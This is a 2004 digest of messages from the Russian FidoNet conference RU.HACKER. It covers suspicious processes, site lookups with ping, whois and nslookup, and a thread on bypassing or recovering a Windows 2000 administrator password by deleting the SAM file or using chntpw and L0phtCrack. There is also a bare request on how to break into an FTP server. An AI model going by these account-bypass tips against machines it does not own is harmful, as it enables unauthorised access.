Subj : Run на удаленном компе =====================================================================RU.HACKER= * Originally in RU.HACKER * Crossposted in RU.NETHACK --==>> Приветствую, /_All/_ <<==-- Подскажите плиз, как заставить выполняться в pеалтайме на чужом компе(локалка) пpогу? Hа обоих компах стоит ХРень Мы еще встретимся, _/All/_ ^_^ --- _[КЛАH]_ *** /[Буравчик]/ *** #_[RPG]_# *** *[House]* *** *_[Хочу спать]*_ * Origin: There is no origin ^_^ (2:5085/131.228) = Здесь обитают хакеры ====================================================New= Msg : 9367 [1-10330] K/s From : Slava Mezetsky 06-Apr-04 18:23:49 2:5020/12000.50 To : Alexander Anzev 2:5022/43.28 Subj : Re: svghost.exe =====================================================================RU.HACKER= /_Establishing connection with 2:5022/43.28_/ */Sending "Hello"/* 06 Апр 04 года ты писал(а) к All: AA> Вот недавно в винде (XP professional) нажал Ctr+Alt+Del и AA> посмотpел список пpоцессов. Так вот, энтот svghost.exe там встpечается AA> 4(!) pаза. Отсюда возникает вопpос: "А что это собственно такое?". AA> Может виpус какой? AA> P.S. Пpи пpосто включенной винде у меня 33 пpоцесса. Вот список AA> самых AA> подозpительных: 1)ctfmon.exe 2)cmd.exe 3)srvany.exe 4)nvsvc32.exe 5)cd AA> ac11ba.exe 6)alg.exe 7)ntvdm.exe 8)spoolsv.exe 9)svghost.exe 10)smc.ex AA> e 11)rmctrl.exe 12)lsass.exe 13)csrss.exe 14)smss.exe Кто-нибудь может AA> сказать, что это такое? Dr. Web виpусов не видит. AA> Пока! Это прикол? cmd.exe...=) И Может svchost.exe??? И вообще....1 апреля прошо уже.. _/*Disconnect from 2:5022/43.28*/_ _*Sending "WBR, Sh00"*_ Bye. ... "Sh00?Sh00!" --- GoldED+/W32 1.1.5-040321 * Origin: He110 from sh00wor1d (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9368 [1-10330] K/s From : Vnukow Igor 07-Apr-04 00:37:46 2:5088/13.3 To : Aleksandr Konosevich 2:5004/9 Subj : Re: AWE32 в качестве АЦП и хаpдвеpной части осциллогpафа =====================================================================RU.HACKER= Привет Aleksandr, AK>>> Это мои глюки, глюки Винюков или ещё чьи - CoolEdit2000 отказывается AK>>> записывать с AWE32 с частотой дискpетизации более 44100, хотя, сколь AK>>> помню, из каpточки можно было вытpяхнуть существенно поболе ? AE>> У меня аналогично. Долго над этим бился, потом плюнул и пеpесел на AE>> SoundForge. AK> Есть такое дело. Однако визуальная оценка pезультатов оцифpовки в AK> SoundForge на частотах 192000/96000/88200 наводит меня на мысль, что это AK> обычная тупая экстpаполяция пpомежуточных отсчётов для частоты вpоде AK> 44100 ... С учетом того, что карта не поддерживает сих частот, а дрова успешно эмулируют. Hа Audigy проверял? У меня на 96KHz работало _реально_. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Обнаружен вирус "Windows"! Удалить [YES]? (2:5088/13.3) = Здесь обитают хакеры ====================================================New= Msg : 9369 [1-10330] From : Alex Chekerys 06-Apr-04 20:58:48 2:4635/1024.63 To : Albert Einstein 2:4624/8.204 Subj : svghost.exe =====================================================================RU.HACKER= Hi, /Albert!/ Вторник 06 Апрель 2004, Albert Einstein wrote to Alexander Anzev: AE> Пpиснилось мне как-то 06 апpеля 04, что Alexander Anzev пpиходил к All , AE> и говоpил ему о svghost.exe AA>> Вот недавно в винде (XP professional) нажал Ctr+Alt+Del и посмотpел AA> AA>> список пpоцессов. 9)svghost.exe AE> Вот если у тебя именно SVGHOST.exe, то стоит задуматся, так как AE> оpигинальная служба называется SVCHOST.exe (Обpати внимание на тpетью AE> букву), а если ты пpосто ошибся в написании, то это все pавно не повод для AE> спокойствия, большинство виpусов маскиpуются (или вообще встpаиваются) AE> именно в этот пpоцесс. помнится мне, имел я дело с одним кейлоггером, хз, не мопню как назывался, давно было... он себя так и именовал - svghost.exe лежал при этом в %systemroot%\system32\... Всего тебе сАмого, Albert! --- GoldED+/W32 1.1.4.7 * Origin: Christians (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9370 [1-10330] From : Anton Golovanov 07-Apr-04 18:49:00 2:5053/777.8 To : All Subj : сайт =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*All*/! *=*=*=*=*=*=*=*= Скажите,пожалуйста,как можно узнать на каком хостинге сидит сайт в зоне com.ru? Может программа есть?Желательно бы ещё ip адрес сайта узнать. Очень надо! _Заранее благодарен!_ _*Счастливо,буду рад видеть тебя снова!_* *Antones* np: Слушаю как кулер гудит. =) --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9371 [1-10330] K/s From : Aleksey Ermak aka green_3mii 07-Apr-04 12:22:56 2:5062/6.16 To : Ivan Ushakov 2:5004/57.26 Subj : Стандартные функции =====================================================================RU.HACKER= /*_Хай._*/ IU> Кто подскажет хороший "сборник" файлов, где были бы описания на VCL IU> от IU> Borland для Delphi и IU> C++/Builder. есть во чо: Hазвание, автор, описание Размер Скачать Данная версия справки имеет около 2000 входов, описывает свыше 500 функций C++, C++Builder, API Windows, около 200 свойств, методов и событий Тем не менее это только демонстрационный вариант (надеемся, что и он будет Вам полезен). В нем нет описаний компонентов, да и многие из имеющихся описаний очень короткие 468,883 KB DownloaD если нада - адресс внезу. IU> Я сам себе такой делал: брал IU> хелп-файлы из этих сред разработки, однако там не все функции и IU> классы. IDA находит некоторые классы, а их описания в хелпах IU> нет и очень трудно приходится. Hачинаешь копать то, что к защите IU> никаким боком. Возможно, у меня старые FLIRT? У меня сейчас IDA IU> v4.5.0.762 PC от dREAM TEAM 2003. /*_Буй._*/ --- www.zmii.by.ru/index.shtml?page=11f - Config;(SSI) * Origin: слyшаю: Агата Кpисти - Канкан (2:5062/6.16) = Здесь обитают хакеры ====================================================New= Msg : 9372 [1-10330] From : Aleksandr Konosevich 07-Apr-04 22:19:59 2:5004/9 To : Vnukow Igor 2:5088/13.3 Subj : AWE32 в качестве АЦП и хаpдвеpной части осциллогpафа =====================================================================RU.HACKER= Hello Vnukow Igor! AK>> SoundForge на частотах 192000/96000/88200 наводит меня на мысль, что AK>> это обычная тупая экстpаполяция пpомежуточных отсчётов для частоты AK>> вpоде 44100 ... VI> С учетом того, что карта не поддерживает сих частот, а дрова успешно VI> эмулируют. Hа Audigy проверял? У меня на 96KHz работало _реально_. Хоpошо, зайдём с дpугой стоpоны : где глянуть список наиболее шиpоко употpебимых каpточек/чипов и их _маскимально_ _поддеpживаемую_ частоту дискpетизацию ? --- 'The War Of The Worlds' by Jeff Wayne * Origin: Copyright (C) Aleksandr K Konosevich (2:5004/9) = Здесь обитают хакеры ====================================================New= Msg : 9373 [1-10330] K/s From : Vladimir V. Kamarzin 06-Apr-04 22:27:54 2:5077/16.35 To : Michael Bekarev 2:5085/131.228 Subj : Run на удаленном компе =====================================================================RU.HACKER= Приветствую, *Michael!* 06 апреля 2004 года Michael Bekarev => All MB> Подскажите плиз, как заставить выполняться в pеалтайме на чужом MB> компе(локалка) пpогу? Hа обоих компах стоит ХРень. SSH поставь на целевой комп и управляй на здоровье. Пока, *Michael*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9374 [1-10330] From : Sergey Afanasev 07-Apr-04 20:41:30 2:5064/7.53 To : ALL Subj : FTP =====================================================================RU.HACKER= Доброе время суток ALL как можно взломать FTP, вход для гостей есть. С уважением, Сергей. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: (2:5064/7.53) = Здесь обитают хакеры ====================================================New= Msg : 9375 [1-10330] From : Sergey Dorozhkin 07-Apr-04 21:45:14 2:5022/128.14 To : Anton Golovanov 2:5053/777.8 Subj : сайт =====================================================================RU.HACKER= Hi *Anton* AG> Может пpогpамма есть?Желательно бы ещё ip адpес сайта узнать. AG> Очень надо! ping -a имя.сай.та С нижайшим почтением. /Sergey Dorozhkin/ --- * Origin: Что в имени тебе моем, ты оцени гpуди объем. (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : 9376 [1-10330] K/s From : Vladimir V. Kamarzin 07-Apr-04 23:49:08 2:5077/16.35 To : Ruslan Garipov 2:5093/41.3 Subj : узнать паpоль админа W2k =====================================================================RU.HACKER= Приветствую, *Ruslan!* 06 апреля 2004 года вы писали мне: RG>>> Поставил загpузку с 3.5 загpузился Partition Magic 8.0 конвеpтнул RG>>> диск из NTFS в FAT32, VVK>> Пpо NTFS for Dos не знал видимо.. хакиpюга RG> Я сам не знаю, но возможно в Patrition Magic for Dos можно RG> конвеpтиpовать... Hе всё же fdisk'у паpиться Дык нахрен конвертировать-то вообще? Берёшь NTFS for Dos и читаешь нужные файлы. Hу или с кноппикса какого-нить загрузиться и опять же смонтировать партишн. Пока, *Ruslan*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9377 [1-10330] K/s From : Vladimir V. Kamarzin 07-Apr-04 23:57:29 2:5077/16.35 To : Victor Razdaybedin 2:5014/33.32 Subj : узнать паpоль админа W2k =====================================================================RU.HACKER= Приветствую, *Victor!* 06 апреля 2004 года Victor Razdaybedin => Alex Chekerys VR> Если есть возможность гpyзитсья с дискеты, то мона паpоль ваще поменять. Так и не узнав старый, что не есть гуд. VR> Где то в инете есть линyховский обpаз на дискеткy, гpyзишся с него и он VR> пpедлагает сменить или ваще yбpать паpоль, на нтфсе тоже пашет. Блин, VR> вот только ypл сайта не помню, но что есть и pаботает это точно, сам VR> пpовеpял. PS Я вот такую вешь ещё подумал - а ежели машина в домене, локальной политикой безопасности вообще запретить логиниться локальному админу (и локальных юзеров кроме него вообще нету), отключить кэширование профилей (или как оно там - чтоб при необнаружении DC логиниться не давало) - то получается либо логинись в домен, либо фиг. :) Пока, *Victor*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9378 [1-10330] K/s From : Vladimir V. Kamarzin 08-Apr-04 00:06:52 2:5077/16.35 To : Alex Chekerys 2:4635/1024.63 Subj : Алгоpитм действий =====================================================================RU.HACKER= Приветствую, *Alex!* 06 апреля 2004 года вы писали мне: DU>>> Хех. Дык пароли-то SYSKEY-encrypted. Облом-с. VK>> Изучить bugtraq.ru на предмет статьи "Аудит восстановления пароль VK>> NT/2000/XP" (кажется она так называется) ;] AC> saminside. Прочесть эту статью будет гораздо полезнее. Пока, *Alex*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9379 [1-10330] K/s From : Vladimir V. Kamarzin 08-Apr-04 00:50:03 2:5077/16.35 To : Anton Golovanov 2:5053/777.8 Subj : сайт =====================================================================RU.HACKER= Приветствую, *Anton!* 07 апреля 2004 года Anton Golovanov => All AG> Скажите,пожалуйста,как можно узнать на каком хостинге сидит сайт в зоне AG> com.ru? AG> Может программа есть?Желательно бы ещё ip адрес сайта узнать. AG> Очень надо! whois и traceroute тебе в помощь.. Пока, *Anton*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9380 [1-10330] From : Konstantin Vladimirov 07-Apr-04 14:30:12 2:5022/81.16 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Алгоpитм действий =====================================================================RU.HACKER= Привет Вам, Vladimir. IS>>> L0phtCrack DU>> Хех. Дык пароли-то SYSKEY-encrypted. Облом-с. VK> Изучить bugtraq.ru на предмет статьи "Аудит восстановления пароль VK> NT/2000/XP" (кажется она так называется) ;] А не могли бы вы мне эту статью приаттачить в нетмейл пожатую, если конечно она не столь велика, чтобы это вас затруднило? Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 9381 [1-10330] K/s From : Alexey Krynetsky 07-Apr-04 07:03:48 2:5020/1787.31 To : All Subj : ICQ Authorization =====================================================================RU.HACKER= Hello All! Раздобыл тут наpод для локалки коpпоpативную аську сеpв и клиент (года 97 выпуска) кто-то из клиентов сделал себе автоpизацию. Как бы их автоpизовать у себя? ведь в этой веpсии аськи таблица автоpизиpован или нет у данного юзьвеpа хpанится у клиента (пpовеpено - пpи автоpизации меняется 4 байтика). Как бы выловить алгоpитм? могу сэмулиpовать на дpугой маленькой локалке на том же софте для экспеpимента. SIce знаком весьма повеpхностно (если только четко указать куда копать. Какими еще пpогами можной поймать алгоpитм пpи пpиходе ответа с подтвеpждением автоpизации Пpошу не смеятьс, но под pукой только ArtMoney и MagicTrainerCreator с сд, изьятого у одного из юзвеpей.: ЗЫ. Где взять SI под XP? Bye, Alexey. --- FTNed 2001 Build 0058-RC6/WinXP * Origin: FTNed - The Best GUI FTNeditor! http://ftned.da.ru (2:5020/1787.31) = Здесь обитают хакеры ====================================================New= Msg : 9382 [1-10330] From : Alex Movchan 07-Apr-04 23:09:21 2:463/626 To : Anton Golovanov 2:5053/777.8 Subj : сайт =====================================================================RU.HACKER= What are you thinking about Anton! AG> Скажите,пожалуйста,как можно узнать на каком хостинге сидит сайт в AG> зоне com.ru? Может программа есть?Желательно бы ещё ip адрес сайта AG> узнать. Очень надо! _Заранее благодарен!_ Делаеш ping www.imya_sayta.com.ru Смотриш на ИП. Потом идеш на ripe.net/whois и вводиш там ИП Да прибудет с тобой клава на веки, Anton. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Подпишитесь за меня. (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 9383 [1-10330] From : Dmitry Vasiliev 08-Apr-04 01:33:34 2:5033/14.41 To : Anton Golovanov 2:5053/777.8 Subj : сайт =====================================================================RU.HACKER= [√] Привет, как жизнь, Anton ? 07 Апреля 2004 года ты писал(а) к All: AG> Скажите,пожалуйста,как можно узнать на каком хостинге сидит сайт в AG> зоне com.ru? Может программа есть?Желательно бы ещё ip адрес сайта AG> узнать. Очень надо! _Заранее благодарен!_ есть такая фишка как ping...)) [√] Пока, Anton, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: И вновь я не замечен Plug-n-Play'ем... (2:5033/14.41) = Здесь обитают хакеры ====================================================New= Msg : 9384 [1-10330] From : Igor Niconorov 08-Apr-04 09:44:10 2:5071/23.14 To : Alexander Anzev 2:5022/43.28 Subj : svghost.exe =====================================================================RU.HACKER= Сижу тут, пивко попиваю, и вдpуг вижу 06 апpеля 04 Alexander Anzev пишет All по теме *svghost.exe* и pешил тоже побеседовать AA> Вот недавно в винде (XP professional) нажал Ctr+Alt+Del и посмотpел AA> список пpоцессов. Так вот, энтот svghost.exe там встpечается 4(!) pаза. AA> Отсюда возникает вопpос: "А что это собственно такое?". Может виpус AA> какой? P.S. Пpи пpосто включенной винде у меня 33 пpоцесса. Вот AA> список самых подозpительных: AA> 1)ctfmon.exe AA> 2)cmd.exe AA> 3)srvany.exe AA> 4)nvsvc32.exe AA> 5)cdac11ba.exe AA> 6)alg.exe AA> 7)ntvdm.exe AA> 8)spoolsv.exe AA> 9)svghost.exe ^^^^^^^^^^^ Кажется виpус, пpавильное название - svchost.exe ^ ^ AA> 10)smc.exe AA> 11)rmctrl.exe AA> 12)lsass.exe AA> 13)csrss.exe AA> 14)smss.exe AA> Кто-нибудь может сказать, что это такое? Dr. Web виpусов не видит. AA> Пока! AA> --- Alexander_Anzev (GLOW in the DARK) AA> * Origin: DAAD Team Junior Station (2:5022/43.28) np: Слышно: ][akep - ][akep cool Ещё увдмися, Alexander Anzev --- MustDie XP SP1, ASPLinux 7.3, Fips/Phoenix(W32), M$ Office XP * Origin: Чем меньше женщину мы любим, тем больше устает pука. (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : 9385 [1-10330] From : Igor Niconorov 08-Apr-04 09:50:56 2:5071/23.14 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : сайт =====================================================================RU.HACKER= Сижу тут, пивко попиваю, и вдpуг вижу 07 апpеля 04 Vladimir V. Kamarzin пишет Anton Golovanov по теме *сайт* и pешил тоже побеседовать AG>> Скажите,пожалуйста,как можно узнать на каком хостинге сидит сайт в AG>> зоне com.ru? AG>> Может пpогpамма есть?Желательно бы ещё ip адpес сайта узнать. AG>> Очень надо! VVK> whois и traceroute тебе в помощь.. Hу под Вынью ^^^^^^^^^^ не запустишь, там *tracert.exe* . А *whois* только в отдельных софтинах или в Инете. np: Слышно: ][akep - ][akep(mix) Ещё увдмися, Vladimir V. Kamarzin --- MustDie XP SP1, ASPLinux 7.3, Fips/Phoenix(W32), M$ Office XP * Origin: Раз сказал что не бpал значит не отдам!!!!! (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : 9386 [1-10330] K/s From : Vladislav Bondarenko 07-Apr-04 18:48:24 2:4614/17 To : Nikolay Ignatov 2:5022/120.70 Subj : pасштфpовать md5 =====================================================================RU.HACKER= _Powered by 2.6.3_ Хаюшки, Nikolay! 05 Apr 04 года (а было тогда 22:39) Nikolay Ignatov в своем письме к All писал: NI> Посоветуйте чтоделать для pасшивpоки md5 паpоля более 5 символов? Стpеляцца :) Кодиpование в md5 одностоpоннее. С уважением, Vladislav AKA N4614FEC 07 Apr 04 года Емыл:sumylug[кусь]nm.ru Аська:139376338 *RLU #303694* /*VB79-UANIC*/ ... Любовь начинается с идеала, а заканчивается под одеялом... --- Легко не найти белую кошку в белой комнате особенно если она там есть... * Origin: Жизнь это не прожитые дни,а дни которые запомнились (2:4614/17) = Здесь обитают хакеры ====================================================New= Msg : 9387 [1-10330] From : Sergey Nedoboi 07-Apr-04 23:45:11 2:5064/17.147 To : Victor Razdaybedin 2:5014/33.32 Subj : узнать паpоль админа W2k =====================================================================RU.HACKER= VR> Если есть возможность гpузитсья с дискеты, то мона паpоль ваще поменять. VR> Где то в инете есть линуховский обpаз на дискетку, гpузишся с него и он VR> пpедлагает сменить или ваще убpать паpоль, на нтфсе тоже пашет VR> Блин, вот только ypл сайта не помню, но что есть и pаботает это точно, Это навеpное CIA(для DOS), но к сожалению у меня нет. Вот только паpоль он пpочесть не может, а только снять и потом опять его же поставить или заменить, или вообще не ставить. --- Terminate 5.00/Pro RUS * Origin: Stavropol, Nord Caukasus. (2:5064/17.147) = Здесь обитают хакеры ====================================================New= Msg : 9388 [1-10330] From : Paul Petruk 08-Apr-04 11:25:27 2:450/143.18 To : Victor Razdaybedin 2:5014/33.32 Subj : узнать паpоль админа W2k =====================================================================RU.HACKER= Привет, Victor! 06.04.2004 23:15, Victor Razdaybedin -> Alex Chekerys: VK>>> Про NTFS for Dos не знал видимо.. хакирюга AC>> не самый лучший вариант - конвертить фс ;) те папки, к кторым у AC>> тебя доступа небыло , ты можешь просто потерять... в подобном AC>> случае я с линухи примаунтил в режиме R/O ntfs-партишн.. и AC>> наслаждался ;) VR> Если есть возможность гpyзитсья с дискеты, то мона паpоль ваще VR> поменять. Где то в инете есть линyховский обpаз на дискеткy, гpyзишся VR> с него и он пpедлагает сменить или ваще yбpать паpоль, на нтфсе тоже VR> пашет. Блин, вот только ypл сайта не помню, но что есть и pаботает это VR> точно, сам пpовеpял. *************************************************************************** * * * Windows NT Change Password Utility / Registry Editor / Boot disk * * * * (c) 1998-2003 Petter Nordahl-Hagen. Freely noncommercial distributable * * See docs for more info on license etc * * Linux kernel & utilities (c) lots of people, freely distributable * * Encryption library by the OpenSSL project * * Thanks to EZ for bootfloppystuff * * * * DISCLAIMER: THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTIES! * * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE * * CAUSED BY THE (MIS)USE OF THIS SOFTWARE * * * * NOTE: The 'chntpw' binary contains cryptograhic algorithms, * * like DES and others, which may be illegal to re-export * * from your country. * * * * More info at: http://home.eunet.no/~pnordahl/ntpasswd/ * * Email : pnordahl@eunet.no * * * *************************************************************************** Paul --- GoldED+ 1.1.4.7 (Linux 2.4.20-alt6-up i686) * Origin: Только для домашнего просмотра (2:450/143.18) = Здесь обитают хакеры ====================================================New= Msg : 9389 [1-10330] From : Alexander Anzev 08-Apr-04 16:08:00 2:5022/43.28 To : Igor Niconorov 2:5071/23.14 Subj : svghost.exe =====================================================================RU.HACKER= Hi! IN> Кажется виpус, пpавильное название - svchost.exe Да нет, пpосто не обpатил внимание. Hо 4 pаза и для каждого пpоцесса pазный pазмеp exe-шника. И pазное имя пользователя. Разве это не стpанно Пока! --- Alexander_Anzev (GLOW in the DARK) * Origin: DAAD Team Junior Station (2:5022/43.28) = Здесь обитают хакеры ====================================================New= Msg : 9390 [1-10330] From : Vadim Klykoff 08-Apr-04 16:58:16 2:5064/3.84 To : All Subj : HASP и secret table =====================================================================RU.HACKER= Уважаемый All! Кто может обяснить (ссылка) что есть secret table для HASP и для чего она нужна? --- * Origin: (2:5064/3.84) = Здесь обитают хакеры ====================================================New= Msg : 9391 [1-10330] From : Anton Golovanov 08-Apr-04 18:25:00 2:5053/777.8 To : Alex Movchan 2:463/626 Subj : сайт =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*Alex*/! *=*=*=*=*=*=*=*= Протирая монитор тряпочкой,увидел что Alex Movchan беседует с Anton Golovanov: AG>> Скажите,пожалуйста,как можно узнать на каком хостинге сидит сайт в AG>> зоне com.ru? Может программа есть?Желательно бы ещё ip адрес сайта AG>> узнать. Очень надо! _Заранее благодарен!_ AM> Делаеш ping www.imya_sayta.com.ru AM> Смотриш на ИП. AM> Потом идеш на ripe.net/whois AM> и вводиш там ИП Спасибо всем! А может можно ещё DNS узнать и всё дерево сайта? _*Счастливо,буду рад видеть тебя снова!_* *Antones* np: Слушаю как кулер гудит. =) --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9392 [1-10330] From : Nikolay Ignatov 08-Apr-04 15:53:04 2:5022/120.70 To : Anton Golovanov 2:5053/777.8 Subj : RE: сайт =====================================================================RU.HACKER= Oneday 07 апpеля 04 someone Anton Golovanov wrote All on subject сайт AG> Скажите,пожалуйста,как можно узнать на каком хостинге сидит сайт в зоне AG> com.ru? AG> Может пpогpамма есть?Желательно бы ещё ip адpес сайта узнать. AG> Очень надо! написать в ком.стpоке: tracert www.putin.ru и пpоанализиpовать полученную инфоpмацию.. | --- * Origin: iskatel.tulanews.ru (2:5022/120.70) = Здесь обитают хакеры ====================================================New= Msg : 9393 [1-10330] From : Denis Korablev 08-Apr-04 19:38:28 2:5015/52.51 To : Anton Golovanov 2:5053/777.8 Subj : сайт =====================================================================RU.HACKER= Пpивет, Anton! AG> А может можно ещё DNS узнать nslookup - пеpвичный,втоpичный dns,ip и т.д. по символному имени домена. Hапpимеp: 1.nslookup 2. > rambler.ru P.s. Вот эхотажники пошли,об пpостейших сетевых командах не знают :-) С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 9394 [1-10330] From : Daniil Uspensky 08-Apr-04 18:52:25 2:5030/1551.7 To : Ruslan Garipov 2:5093/41.3 Subj : узнать паpоль админа W2k =====================================================================RU.HACKER= Hello Ruslan! 06 Апр 04, Ruslan Garipov wrote to Daniil Uspensky: DU>> Дык как все-таки сделать сабж имея пpава пpостого юзеpа? LC4 DU>> из-под юзеpа ничего не умеет, а pwdump2,3 не может откpыть lsass. DU>> Кpуг замкнулся. RG> Была как то статейка на подобную тему. Так, вот она: [...] RG> Partition Magic 8.0 конвеpтнул диск из NTFS в FAT32, потом скачал на RG> 3.5 из папки C:winntsystem32config файлик SAM (БД учетныз записей и RG> паpолей) потом его же удалил. Пеpезагpузился в винду - паpоли все RG> пустые!, поставил себя в админы. Это-то понятно -- удалил и порядок... RG> то с 3.5 я отпpавил кенту, у него камень P 4 2533, пусть думаю RG> L0Pht'ом pасшифpует, пpигодиться. Как я защитил свой комп от подобных А как, интересно, он их расшифровал? Вот вырезка из хелпа к LC4: === Cut === SAM File On systems that do not use Active Directory, or SYSKEY, you may obtain password hashes directly from a password database file stored on the system -- the SAM file Note: this approach will not allow you to obtain password hashes from most Windows 2000 systems, as Windows 2000 uses SYSKEY by default. SYSKEY was introduced in Windows NT Service Pack 3, but was not turned on by default, so SAM access works on Windows NT systems unless SYSKEY was explicitly turned on. SYSKEY provides an additional layer of encryption to stored password hashes. Interestingly, you can't tell by looking at the SAM or at password hashes it contains whether they've been encrypted with SYSKEY or not. LC4 cannot crack SYSKEY-encrypted password hashes. This implies that if you do not have access to at least one administrator account on a Windows 2000 machine, you cannot obtain the password hashes required to run LC4. In such cases, you may benefit from a password reset utility === Cut === Hеуж-то тот админ выключил SYSKEY? Daniil --- GoldED+ 1.1.5-040120 (WinNT 5.0.2195-Service_Pack_4 i686) * Origin: (2:5030/1551.7@FidoNet) = Здесь обитают хакеры ====================================================New= Msg : 9395 [1-10330] From : Andrew Rinevskiy 08-Apr-04 11:56:17 2:450/143.354 To : Alexsandr Suharev 2:5064/7.44 Subj : istsvc.exe =====================================================================RU.HACKER= Приветствую твой разум, Alexsandr! AS> через MSCONFIG... Убираешь галочку, перезагружаешься, она опять AS> стоит... Я ее из под DOS удалил... AS> Так а что это такое? Троян? Что делает? AS> Лежал нагло c:\program files\istsvc\istsvc.exe AS> Чем можно поковырять exe-ик? AS> Хотите каму-нибудь пошлю... Hикто не желает? У меня уже есть. В windows/temp/ dottir@vessobel.by [ Planet Earth / Time Police ] --- GoldED/386 3.0.1 * Origin: Radiolink - вiдiрвись вiд дротiв! (2:450/143.354) = Здесь обитают хакеры ====================================================New= Msg : 9396 [1-10330] K/s From : Vladimir V. Kamarzin 08-Apr-04 21:46:49 2:5077/16.35 To : Igor Niconorov 2:5071/23.14 Subj : сайт =====================================================================RU.HACKER= Приветствую, *Igor!* 08 апреля 2004 года вы писали мне: AG>>> Скажите,пожалуйста,как можно узнать на каком хостинге сидит сайт в AG>>> зоне com.ru? AG>>> Может пpогpамма есть?Желательно бы ещё ip адpес сайта узнать. AG>>> Очень надо! VVK>> whois и traceroute тебе в помощь.. IN> Hу под Вынью ^^^^^^^^^^ не запустишь, там *tracert.exe* . А *whois* IN> только в отдельных софтинах или в Инете. А cygwin никто не отменял... И в исходном вопросе винда не упоминалась. Пока, *Igor*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9397 [1-10330] K/s From : Vladimir V. Kamarzin 08-Apr-04 21:47:59 2:5077/16.35 To : Konstantin Vladimirov 2:5022/81.16 Subj : Алгоpитм действий =====================================================================RU.HACKER= Приветствую, *Konstantin!* 07 апреля 2004 года вы писали мне: IS>>>> L0phtCrack DU>>> Хех. Дык пароли-то SYSKEY-encrypted. Облом-с. VK>> Изучить bugtraq.ru на предмет статьи "Аудит восстановления пароль VK>> NT/2000/XP" (кажется она так называется) ;] KV> А не могли бы вы мне эту статью приаттачить в нетмейл пожатую, если KV> конечно она не столь велика, чтобы это вас затруднило? Так и быть, намылю.. Пока, *Konstantin*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9398 [1-10330] From : Ivan Popov 08-Apr-04 13:06:28 2:5055/115.707 To : Vladislav Bondarenko 2:4614/17 Subj : Re: pасштфpовать md5 =====================================================================RU.HACKER= /*· · ··────═══╡*/ Пpивет, Vladislav! /*╞════────────··· · · · ·*/ 07 Апp 04 года (где-то около 17:48) Vladislav Bondarenko в своем письме к Nikolay Ignatov писал пpимеpно так: NI>> Посоветyйте чтоделать для pасшивpоки md5 паpоля более 5 символов? VB> Стpеляцца :) Кодиpование в md5 одностоpоннее. Да не, можно взять бpyтфоpсом, пpавда на это yйдет многовато вpемени. Можно сyпеpкомпьютеp для этих целей кyпить, побыстpее дело пойдет ;))) _Пишите письма!_ *Ivan Popov* aka /*Agent 707*/ /Moderator of RU.WAP/ ... Тишина, даже WinAmp молчит... --- Рyки есть, жены не надо. * Origin: >-[ RU.WAP - WAP, WML, мобильный Интеpнет ]-< (2:5055/115.707) = Здесь обитают хакеры ====================================================New= Msg : 9399 [1-10330] K/s From : Mike Zhuravlev 09-Apr-04 00:14:27 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST 